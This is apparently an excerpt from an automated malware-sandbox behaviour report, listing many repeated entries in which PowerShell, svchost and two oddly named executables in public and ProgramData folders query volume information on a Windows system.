                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\ProgramData\Program\iusb3mon.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
